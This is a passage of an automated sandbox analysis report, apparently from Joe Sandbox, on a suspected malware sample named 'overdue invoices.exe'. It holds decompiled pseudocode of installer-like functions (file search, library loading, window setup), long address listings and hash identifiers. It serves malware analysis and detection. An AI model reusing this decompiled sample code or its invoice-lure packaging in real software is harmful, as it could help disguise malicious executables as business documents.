								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                  0x00000000
                  0x0040604c
                  0x0040604c
                  0x00406051
                  0x004060c8
                  0x004060cf
                  0x004060d9
                  0x004066b8
                  0x004066b8
                  0x004066bb
                  0x004066bb
                  0x004066c1
                  0x004066c7
                  0x004066cd
                  0x004066e7
                  0x004066ea
                  0x004066f0
                  0x004066fb
                  0x004066fd
                  0x004066cf
                  0x004066cf
                  0x004066de
                  0x004066e2
                  0x004066e2
                  0x00406707
                  0x0040672e
                  0x0040672e
                  0x00406734
                  0x00406734
                  0x00000000
                  0x00406709
                  0x00406709
                  0x0040670d
                  0x004068bc
                  0x00000000
                  0x004068bc
                  0x00406719
                  0x00406720
                  0x00406728
                  0x0040672b
                  0x00000000
                  0x0040672b
                  0x00406053
                  0x00406053
                  0x00406057
                  0x0040605f
                  0x00406062
                  0x00406064
                  0x00406067
                  0x00406069
                  0x0040606e
                  0x00406071
                  0x00406078
                  0x0040607f
                  0x00406082
                  0x0040608d
                  0x00406095
                  0x00406095
                  0x0040608f
                  0x0040608f
                  0x0040608f
                  0x00406084
                  0x00406084
                  0x00406084
                  0x0040609c
                  0x004060ba
                  0x004060bc
                  0x0040628f
                  0x0040628f
                  0x00406292
                  0x00406295
                  0x00406298
                  0x0040629b
                  0x0040629e
                  0x004062a1
                  0x004062a4
                  0x004062a7
                  0x004062ad
                  0x004062c5
                  0x004062c8
                  0x004062cb
                  0x004062ce
                  0x004062ce
                  0x004062d1
                  0x004062d7
                  0x004062af
                  0x004062af
                  0x004062b7
                  0x004062bc
                  0x004062be
                  0x004062c0
                  0x004062c0
                  0x004062e1
                  0x004062e4
                  0x00406287
                  0x0040628d
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004062e6
                  0x00406262
                  0x00406266
                  0x0040686e
                  0x00000000
                  0x0040686e
                  0x0040626c
                  0x0040626f
                  0x00406272
                  0x00406276
                  0x00406279
                  0x0040627f
                  0x00406281
                  0x00406281
                  0x00406284
                  0x00000000
                  0x00406284
                  0x0040609e
                  0x0040609e
                  0x004060a1
                  0x004060a7
                  0x004060a9
                  0x004060a9
                  0x004060ac
                  0x004060af
                  0x004060b1
                  0x004060b2
                  0x004060b5
                  0x00406122
                  0x00406122
                  0x00406126
                  0x00406129
                  0x0040612c
                  0x0040612f
                  0x00406132
                  0x00406133
                  0x00406136
                  0x00406138
                  0x0040613e
                  0x00406141
                  0x00406144
                  0x00406147
                  0x0040614a
                  0x00406150
                  0x0040616c
                  0x0040616f
                  0x00406172
                  0x00406175
                  0x0040617c
                  0x00406182
                  0x00406186
                  0x00406152
                  0x00406152
                  0x00406156
                  0x0040615e
                  0x00406163
                  0x00406165
                  0x00406167
                  0x00406167
                  0x00406190
                  0x00406193
                  0x0040610a
                  0x0040610a
                  0x00406110
                  0x004061c3
                  0x004061c9
                  0x00000000
                  0x00000000
                  0x004061cb
                  0x004061ce
                  0x004061d1
                  0x004061d4
                  0x004061d7
                  0x004061da
                  0x004061dd
                  0x004061e0
                  0x004061e3
                  0x004061e9
                  0x00406201
                  0x00406204
                  0x00406207
                  0x0040620a
                  0x0040620a
                  0x0040620d
                  0x00406213
                  0x004061eb
                  0x004061eb
                  0x004061f3
                  0x004061f8
                  0x004061fa
                  0x004061fc
                  0x004061fc
                  0x0040621d
                  0x00406220
                  0x0040619e
                  0x004061a2
                  0x00406862
                  0x00000000
                  0x00406862
                  0x004061a8
                  0x004061ab
                  0x004061ae
                  0x004061b2
                  0x004061b5
                  0x004061bb
                  0x004061bd
                  0x004061bd
                  0x004061c0
                  0x004061c0
                  0x00406220
                  0x00406227
                  0x00406227
                  0x00406227
                  0x0040622b
                  0x0040622b
                  0x0040622e
                  0x00406231
                  0x00406235
                  0x0040687a
                  0x00000000
                  0x0040687a
                  0x0040623b
                  0x0040623e
                  0x00406241
                  0x00406244
                  0x00406247
                  0x0040624a
                  0x0040624d
                  0x0040624f
                  0x00406252
                  0x00406255
                  0x00406258
                  0x0040625a
                  0x0040625a
                  0x0040625a
                  0x004063f7
                  0x004063f7
                  0x004063fa
                  0x004063fa
                  0x00000000
                  0x004063fa
                  0x0040611c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406199
                  0x004060e5
                  0x004060e9
                  0x00406856
                  0x004068d2
                  0x004068da
                  0x004068e1
                  0x004068e3
                  0x004068ea
                  0x004068ee
                  0x004068ee
                  0x004060ef
                  0x004060f2
                  0x004060f5
                  0x004060f9
                  0x004060fc
                  0x00406102
                  0x00406104
                  0x00406104
                  0x00406107
                  0x00000000
                  0x00406107
                  0x00406193
                  0x0040609c
                  0x00405ed0
                  0x00405ed0
                  0x00405ed9
                  0x004068e7
                  0x004068e7
                  0x00000000
                  0x004068e7
                  0x00405edf
                  0x00000000
                  0x00405eea
                  0x00000000
                  0x00000000
                  0x00405ef3
                  0x00405ef6
                  0x00405ef9
                  0x00405efd
                  0x00000000
                  0x00000000
                  0x00405f03
                  0x00405f06
                  0x00405f08
                  0x00405f09
                  0x00405f0c
                  0x00405f0e
                  0x00405f0f
                  0x00405f11
                  0x00405f14
                  0x00405f19
                  0x00405f1e
                  0x00405f27
                  0x00405f3a
                  0x00405f3d
                  0x00405f49
                  0x00405f71
                  0x00405f73
                  0x00405f81
                  0x00405f81
                  0x00405f85
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405f75
                  0x00405f75
                  0x00405f78
                  0x00405f79
                  0x00405f79
                  0x00000000
                  0x00405f75
                  0x00405f4f
                  0x00405f54
                  0x00405f54
                  0x00405f5d
                  0x00405f65
                  0x00405f68
                  0x00000000
                  0x00405f6e
                  0x00405f6e
                  0x00000000
                  0x00405f6e
                  0x00000000
                  0x00405f8b
                  0x00405f8b
                  0x00405f8f
                  0x0040683b
                  0x00000000
                  0x0040683b
                  0x00405f98
                  0x00405fa8
                  0x00405fab
                  0x00405fae
                  0x00405fae
                  0x00405fae
                  0x00405fb1
                  0x00405fb5
                  0x00000000
                  0x00000000
                  0x00405fb7
                  0x00405fbd
                  0x00405fe7
                  0x00405fed
                  0x00405ff4
                  0x00000000
                  0x00405ff4
                  0x00405fc3
                  0x00405fc6
                  0x00405fcb
                  0x00405fcb
                  0x00405fd6
                  0x00405fde
                  0x00405fe1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406026
                  0x0040602c
                  0x0040602f
                  0x0040603c
                  0x00406044
                  0x00000000
                  0x00000000
                  0x00405ffb
                  0x00405ffb
                  0x00405fff
                  0x0040684a
                  0x00000000
                  0x0040684a
                  0x0040600b
                  0x00406016
                  0x00406016
                  0x00406016
                  0x00406019
                  0x0040601c
                  0x0040601f
                  0x00406024
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004062eb
                  0x004062ef
                  0x0040630d
                  0x00406310
                  0x00406317
                  0x0040631a
                  0x0040631d
                  0x00406320
                  0x00406323
                  0x00406326
                  0x00406328
                  0x0040632f
                  0x00406330
                  0x00406332
                  0x00406335
                  0x00406338
                  0x0040633b
                  0x0040633b
                  0x00406340
                  0x00000000
                  0x00406340
                  0x004062f1
                  0x004062f4
                  0x004062f7
                  0x00406301
                  0x00000000
                  0x00000000
                  0x00406355
                  0x00406359
                  0x0040637c
                  0x0040637f
                  0x00406382
                  0x0040638c
                  0x0040635b
                  0x0040635b
                  0x0040635e
                  0x00406361
                  0x00406364
                  0x00406371
                  0x00406374
                  0x00406374
                  0x00000000
                  0x00000000
                  0x00406398
                  0x0040639c
                  0x00000000
                  0x00000000
                  0x004063a2
                  0x004063a6
                  0x00000000
                  0x00000000
                  0x004063ac
                  0x004063ae
                  0x004063b2
                  0x004063b2
                  0x004063b5
                  0x004063b9
                  0x00000000
                  0x00000000
                  0x00406409
                  0x0040640d
                  0x00406414
                  0x00406417
                  0x0040641a
                  0x00406424
                  0x00000000
                  0x00406424
                  0x0040640f
                  0x00000000
                  0x00000000
                  0x00406430
                  0x00406434
                  0x0040643b
                  0x0040643e
                  0x00406441
                  0x00406436
                  0x00406436
                  0x00406436
                  0x00406444
                  0x00406447
                  0x0040644a
                  0x0040644a
                  0x0040644d
                  0x00406450
                  0x00406453
                  0x00406453
                  0x00406456
                  0x0040645d
                  0x00406462
                  0x00000000
                  0x00000000
                  0x004064f0
                  0x004064f0
                  0x004064f4
                  0x00406892
                  0x00000000
                  0x00406892
                  0x004064fa
                  0x004064fd
                  0x00406500
                  0x00406504
                  0x00406507
                  0x0040650d
                  0x0040650f
                  0x0040650f
                  0x0040650f
                  0x00406512
                  0x00406515
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406573
                  0x00406573
                  0x00406577
                  0x0040689e
                  0x00000000
                  0x0040689e
                  0x0040657d
                  0x00406580
                  0x00406583
                  0x00406587
                  0x0040658a
                  0x00406590
                  0x00406592
                  0x00406592
                  0x00406592
                  0x00406595
                  0x00000000
                  0x00000000
                  0x00406343
                  0x00406343
                  0x00406346
                  0x00000000
                  0x00000000
                  0x00406682
                  0x00406686
                  0x004066a8
                  0x004066ab
                  0x004066b5
                  0x00000000
                  0x004066b5
                  0x00406688
                  0x0040668b
                  0x0040668f
                  0x00406692
                  0x00406692
                  0x00406695
                  0x00000000
                  0x00000000
                  0x0040673f
                  0x00406743
                  0x00406761
                  0x00406761
                  0x00406761
                  0x00406768
                  0x0040676f
                  0x00406776
                  0x00406776
                  0x00000000
                  0x00406776
                  0x00406745
                  0x00406748
                  0x0040674b
                  0x0040674e
                  0x00406755
                  0x00406699
                  0x00406699
                  0x0040669c
                  0x00000000
                  0x00000000
                  0x00406830
                  0x00406833
                  0x00000000
                  0x00000000
                  0x0040646a
                  0x0040646c
                  0x00406473
                  0x00406474
                  0x00406476
                  0x00406479
                  0x00000000
                  0x00000000
                  0x00406481
                  0x00406484
                  0x00406487
                  0x00406489
                  0x0040648b
                  0x0040648b
                  0x0040648c
                  0x0040648f
                  0x00406496
                  0x00406499
                  0x004064a7
                  0x00000000
                  0x00000000
                  0x0040677d
                  0x0040677d
                  0x00406780
                  0x00406787
                  0x00000000
                  0x00000000
                  0x0040678c
                  0x0040678c
                  0x00406790
                  0x004068c8
                  0x00000000
                  0x004068c8
                  0x00406796
                  0x00406799
                  0x0040679c
                  0x004067a0
                  0x004067a3
                  0x004067a9
                  0x004067ab
                  0x004067ab
                  0x004067ab
                  0x004067ae
                  0x004067b1
                  0x004067b1
                  0x004067b1
                  0x004067b1
                  0x004067b4
                  0x004067b4
                  0x004067b8
                  0x00406818
                  0x0040681b
                  0x00406820
                  0x00406821
                  0x00406823
                  0x00406825
                  0x00406828
                  0x00000000
                  0x00406828
                  0x004067ba
                  0x004067c0
                  0x004067c3
                  0x004067c6
                  0x004067c9
                  0x004067cc
                  0x004067cf
                  0x004067d2
                  0x004067d5
                  0x004067d8
                  0x004067db
                  0x004067f4
                  0x004067f7
                  0x004067fa
                  0x004067fd
                  0x00406801
                  0x00406803
                  0x00406803
                  0x00406804
                  0x00406807
                  0x004067dd
                  0x004067dd
                  0x004067e5
                  0x004067ea
                  0x004067ec
                  0x004067ef
                  0x004067ef
                  0x0040680a
                  0x00406811
                  0x00000000
                  0x00406813
                  0x00000000
                  0x00406813
                  0x00000000
                  0x004064af
                  0x004064b2
                  0x004064e8
                  0x00406618
                  0x00406618
                  0x00406618
                  0x00406618
                  0x0040661b
                  0x0040661b
                  0x0040661e
                  0x00406620
                  0x004068aa
                  0x00000000
                  0x004068aa
                  0x00406626
                  0x00406629
                  0x00000000
                  0x00000000
                  0x0040662f
                  0x00406633
                  0x00406636
                  0x00406636
                  0x00406636
                  0x00000000
                  0x00406636
                  0x004064b4
                  0x004064b6
                  0x004064b8
                  0x004064ba
                  0x004064bd
                  0x004064be
                  0x004064c0
                  0x004064c2
                  0x004064c5
                  0x004064c8
                  0x004064de
                  0x004064e3
                  0x0040651b
                  0x0040651b
                  0x0040651f
                  0x0040654b
                  0x0040654d
                  0x00406554
                  0x00406557
                  0x0040655a
                  0x0040655a
                  0x0040655f
                  0x0040655f
                  0x00406561
                  0x00406564
                  0x0040656b
                  0x0040656e
                  0x0040659b
                  0x0040659b
                  0x0040659e
                  0x004065a1
                  0x00406615
                  0x00406615
                  0x00406615
                  0x00000000
                  0x00406615
                  0x004065a3
                  0x004065a9
                  0x004065ac
                  0x004065af
                  0x004065b2
                  0x004065b5
                  0x004065b8
                  0x004065bb
                  0x004065be
                  0x004065c1
                  0x004065c4
                  0x004065dd
                  0x004065df
                  0x004065e2
                  0x004065e3
                  0x004065e6
                  0x004065e8
                  0x004065eb
                  0x004065ed
                  0x004065ef
                  0x004065f2
                  0x004065f4
                  0x004065f7
                  0x004065fb
                  0x004065fd
                  0x004065fd
                  0x004065fe
                  0x00406601
                  0x00406604
                  0x004065c6
                  0x004065c6
                  0x004065ce
                  0x004065d3
                  0x004065d5
                  0x004065d8
                  0x004065d8
                  0x00406607
                  0x0040660e
                  0x00406598
                  0x00406598
                  0x00406598
                  0x00406598
                  0x00000000
                  0x00406610
                  0x00000000
                  0x00406610
                  0x0040660e
                  0x00406521
                  0x00406524
                  0x00406526
                  0x00406529
                  0x0040652c
                  0x0040652f
                  0x00406531
                  0x00406534
                  0x00406537
                  0x00406537
                  0x0040653a
                  0x0040653a
                  0x0040653d
                  0x00406544
                  0x00406518
                  0x00406518
                  0x00406518
                  0x00406518
                  0x00000000
                  0x00406546
                  0x00000000
                  0x00406546
                  0x00406544
                  0x004064ca
                  0x004064cd
                  0x004064cf
                  0x004064d2
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004063bc
                  0x004063bc
                  0x004063c0
                  0x00406886
                  0x00000000
                  0x00406886
                  0x004063c6
                  0x004063c9
                  0x004063cc
                  0x004063cf
                  0x004063d1
                  0x004063d1
                  0x004063d1
                  0x004063d4
                  0x004063d7
                  0x004063da
                  0x004063dd
                  0x004063e0
                  0x004063e3
                  0x004063e4
                  0x004063e6
                  0x004063e6
                  0x004063e6
                  0x004063e9
                  0x004063ec
                  0x004063ef
                  0x004063f2
                  0x004063f2
                  0x004063f2
                  0x004063f5
                  0x00000000
                  0x00000000
                  0x00406639
                  0x00406639
                  0x00406639
                  0x0040663d
                  0x00000000
                  0x00000000
                  0x00406643
                  0x00406646
                  0x00406649
                  0x0040664c
                  0x0040664e
                  0x0040664e
                  0x0040664e
                  0x00406651
                  0x00406654
                  0x00406657
                  0x0040665a
                  0x0040665d
                  0x00406660
                  0x00406661
                  0x00406663
                  0x00406663
                  0x00406663
                  0x00406666
                  0x00406669
                  0x0040666c
                  0x0040666f
                  0x00406672
                  0x00406676
                  0x00406678
                  0x0040667b
                  0x00000000
                  0x0040667d
                  0x00000000
                  0x0040667d
                  0x0040667b
                  0x004068b0
                  0x00000000
                  0x00000000
                  0x00405edf

                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
                  • Instruction ID: f98c46a7d4a45b1e93054ee16d037c4b99b117d06cd84a33c86e8ff0b6c30e47
                  • Opcode Fuzzy Hash: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
                  • Instruction Fuzzy Hash: 83F18771D00229CBDF18DFA8C8946ADBBB1FF44305F25816ED856BB281D3785A86CF44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00405D7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 613 405d7c-405d90 FindFirstFileA 614 405d92-405d9b FindClose 613->614 615 405d9d 613->615 616 405d9f-405da0 614->616 615->616
                  C-Code - Quality: 100%
                  			E00405D7C(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x4224e8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4224e8;
			}




                  0x00405d87
                  0x00405d90
                  0x00000000
                  0x00405d9d
                  0x00405d93
                  0x00000000

                  APIs
                  • FindFirstFileA.KERNELBASE(?,004224E8,004218A0,0040569C,004218A0,004218A0,00000000,004218A0,004218A0,?,?,747DF560,004053BE,?,"C:\Users\user\Desktop\overdue invoices.exe" ,747DF560), ref: 00405D87
                  • FindClose.KERNEL32(00000000), ref: 00405D93
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: Find$CloseFileFirst
                  • String ID: $B
                  • API String ID: 2295610775-2366330246
                  • Opcode ID: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
                  • Instruction ID: 8877f450b99b184e504413f9ffa66f4d164bf9bd4a7d07bd52ad5b53af664480
                  • Opcode Fuzzy Hash: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
                  • Instruction Fuzzy Hash: 84D012319595306BC75127386D0C84B7A59DF15331750CA33F02AF22F0D3748C518AAD
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00405DA3 Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00405DA3(signed int _a4) {
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				signed int _t9;

				_t9 = _a4 << 3;
				_t7 =  *(_t9 + 0x409218);
				_t5 = GetModuleHandleA(_t7);
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t9 + 0x40921c));
				}
				_t5 = LoadLibraryA(_t7); // executed
				if(_t5 != 0) {
					goto L2;
				}
				return _t5;
			}






                  0x00405dab
                  0x00405dae
                  0x00405db5
                  0x00405dbd
                  0x00405dca
                  0x00000000
                  0x00405dd1
                  0x00405dc0
                  0x00405dc8
                  0x00000000
                  0x00000000
                  0x00405dd9

                  APIs
                  • GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                  • LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                  • GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: AddressHandleLibraryLoadModuleProc
                  • String ID:
                  • API String ID: 310444273-0
                  • Opcode ID: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
                  • Instruction ID: 37252885b6730f192407f0687863edf929784b14cf5d3781349e011cb12c2895
                  • Opcode Fuzzy Hash: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
                  • Instruction Fuzzy Hash: F7E0C232A04610ABC6114B709D489BB77BCEFE9B41300897EF545F6290C734AC229FFA
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004035E3 Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 213stringregistrylibraryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 108 4035e3-4035fb call 405da3 111 4035fd-40360d call 4059e3 108->111 112 40360f-403636 call 40596c 108->112 121 403659-403678 call 403897 call 405659 111->121 117 403638-403649 call 40596c 112->117 118 40364e-403654 lstrcatA 112->118 117->118 118->121 126 40367e-403683 121->126 127 4036ff-403707 call 405659 121->127 126->127 128 403685-4036a9 call 40596c 126->128 133 403715-40373a LoadImageA 127->133 134 403709-403710 call 405aa7 127->134 128->127 135 4036ab-4036ad 128->135 137 403740-403776 RegisterClassA 133->137 138 4037c9-4037d1 call 40140b 133->138 134->133 139 4036be-4036ca lstrlenA 135->139 140 4036af-4036bc call 4055a3 135->140 141 40377c-4037c4 SystemParametersInfoA CreateWindowExA 137->141 142 40388d 137->142 152 4037d3-4037d6 138->152 153 4037db-4037e6 call 403897 138->153 146 4036f2-4036fa call 405578 call 405a85 139->146 147 4036cc-4036da lstrcmpiA 139->147 140->139 141->138 144 40388f-403896 142->144 146->127 147->146 151 4036dc-4036e6 GetFileAttributesA 147->151 156 4036e8-4036ea 151->156 157 4036ec-4036ed call 4055bf 151->157 152->144 161 403864-40386c call 404ef5 153->161 162 4037e8-403805 ShowWindow LoadLibraryA 153->162 156->146 156->157 157->146 170 403886-403888 call 40140b 161->170 171 40386e-403874 161->171 163 403807-40380c LoadLibraryA 162->163 164 40380e-403820 GetClassInfoA 162->164 163->164 166 403822-403832 GetClassInfoA RegisterClassA 164->166 167 403838-403862 DialogBoxParamA call 40140b 164->167 166->167 167->144 170->142 171->152 174 40387a-403881 call 40140b 171->174 174->152
                  C-Code - Quality: 96%
                  			E004035E3() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				signed int _t24;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t39;
				int _t42;
				intOrPtr _t59;
				char _t61;
				CHAR* _t63;
				signed char _t67;
				struct HINSTANCE__* _t75;
				CHAR* _t78;
				intOrPtr _t80;
				CHAR* _t85;

				_t80 =  *0x423eb0; // 0x55dba8
				_t20 = E00405DA3(6);
				_t87 = _t20;
				if(_t20 == 0) {
					_t78 = 0x420498;
					"1033" = 0x7830;
					E0040596C(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420498, 0);
					__eflags =  *0x420498;
					if(__eflags == 0) {
						E0040596C(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x420498, 0);
					}
					lstrcatA("1033", _t78);
				} else {
					E004059E3("1033",  *_t20() & 0x0000ffff);
				}
				E00403897(_t75, _t87);
				_t24 =  *0x423eb8; // 0x80
				_t84 = "C:\\Users\\engineer\\AppData\\Local\\Temp";
				 *0x423f20 = _t24 & 0x00000020;
				if(E00405659(_t87, "C:\\Users\\engineer\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405659(_t95, _t84) == 0) {
						E00405AA7(0, _t78, _t80, _t84,  *((intOrPtr*)(_t80 + 0x118)));
					}
					_t28 = LoadImageA( *0x423ea0, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423688 = _t28;
					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E00403897(_t75, __eflags);
							__eflags =  *0x423f40; // 0x0
							if(__eflags != 0) {
								_t31 = E00404EF5(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42366c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420470, 5);
							_t37 = LoadLibraryA("RichEd20");
							__eflags = _t37;
							if(_t37 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x423640);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x423640);
								 *0x423664 = _t85;
								RegisterClassA(0x423640);
							}
							_t39 =  *0x423680; // 0x0
							_t42 = DialogBoxParamA( *0x423ea0, _t39 + 0x00000069 & 0x0000ffff, 0, E00403964, 0);
							E0040140B(5);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t75 =  *0x423ea0; // 0x400000
						 *0x423654 = _t28;
						_v20 = 0x624e5f;
						 *0x423644 = E00401000;
						 *0x423650 = _t75;
						 *0x423664 =  &_v20;
						if(RegisterClassA(0x423640) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420470 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423ea0, 0);
						goto L21;
					}
				} else {
					_t75 =  *(_t80 + 0x48);
					if(_t75 == 0) {
						goto L16;
					}
					_t59 =  *0x423ed8; // 0x5626dc
					_t78 = 0x422e40;
					E0040596C( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) + _t59, 0x422e40, 0);
					_t61 =  *0x422e40; // 0x69
					if(_t61 == 0) {
						goto L16;
					}
					if(_t61 == 0x22) {
						_t78 = 0x422e41;
						 *((char*)(E004055A3(0x422e41, 0x22))) = 0;
					}
					_t63 = lstrlenA(_t78) + _t78 - 4;
					if(_t63 <= _t78 || lstrcmpiA(_t63, ?str?) != 0) {
						L15:
						E00405A85(_t84, E00405578(_t78));
						goto L16;
					} else {
						_t67 = GetFileAttributesA(_t78);
						if(_t67 == 0xffffffff) {
							L14:
							E004055BF(_t78);
							goto L15;
						}
						_t95 = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}





























                  0x004035e9
                  0x004035f2
                  0x004035f9
                  0x004035fb
                  0x0040360f
                  0x00403621
                  0x0040362b
                  0x00403630
                  0x00403636
                  0x00403649
                  0x00403649
                  0x00403654
                  0x004035fd
                  0x00403608
                  0x00403608
                  0x00403659
                  0x0040365e
                  0x00403663
                  0x0040366c
                  0x00403678
                  0x004036ff
                  0x00403707
                  0x00403710
                  0x00403710
                  0x00403726
                  0x0040372c
                  0x0040373a
                  0x004037c9
                  0x004037d1
                  0x004037db
                  0x004037e0
                  0x004037e6
                  0x00403865
                  0x0040386a
                  0x0040386c
                  0x00403888
                  0x00000000
                  0x00403888
                  0x0040386e
                  0x00403874
                  0x0040387c
                  0x0040387c
                  0x00000000
                  0x00403874
                  0x004037f0
                  0x00403801
                  0x00403803
                  0x00403805
                  0x0040380c
                  0x0040380c
                  0x00403814
                  0x0040381c
                  0x0040381e
                  0x00403820
                  0x00403829
                  0x0040382c
                  0x00403832
                  0x00403832
                  0x00403838
                  0x00403851
                  0x0040385b
                  0x00000000
                  0x00403860
                  0x004037d3
                  0x004037d5
                  0x00000000
                  0x00403740
                  0x00403740
                  0x00403746
                  0x00403750
                  0x00403758
                  0x00403762
                  0x00403768
                  0x00403776
                  0x0040388d
                  0x0040388d
                  0x00000000
                  0x0040388d
                  0x0040377c
                  0x00403785
                  0x004037c4
                  0x00000000
                  0x004037c4
                  0x0040367e
                  0x0040367e
                  0x00403683
                  0x00000000
                  0x00000000
                  0x00403688
                  0x0040368d
                  0x0040369d
                  0x004036a2
                  0x004036a9
                  0x00000000
                  0x00000000
                  0x004036ad
                  0x004036af
                  0x004036bc
                  0x004036bc
                  0x004036c4
                  0x004036ca
                  0x004036f2
                  0x004036fa
                  0x00000000
                  0x004036dc
                  0x004036dd
                  0x004036e6
                  0x004036ec
                  0x004036ed
                  0x00000000
                  0x004036ed
                  0x004036e8
                  0x004036ea
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004036ea
                  0x004036ca

                  APIs
                    • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
